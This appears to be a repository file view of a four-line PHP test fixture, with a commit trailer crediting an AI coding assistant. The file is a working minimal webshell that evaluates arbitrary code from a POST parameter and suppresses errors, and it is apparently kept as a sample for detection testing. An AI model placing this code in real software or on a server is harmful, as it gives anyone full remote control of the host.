Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01V3s6WnubSSrFjAQTLQdVbG
4 lines
98 B
PHP
4 lines
98 B
PHP
<?php
|
|
// Minimal classic PHP webshell (test fixture — never deployed).
|
|
@eval($_POST['cmd']);
|
|
?>
|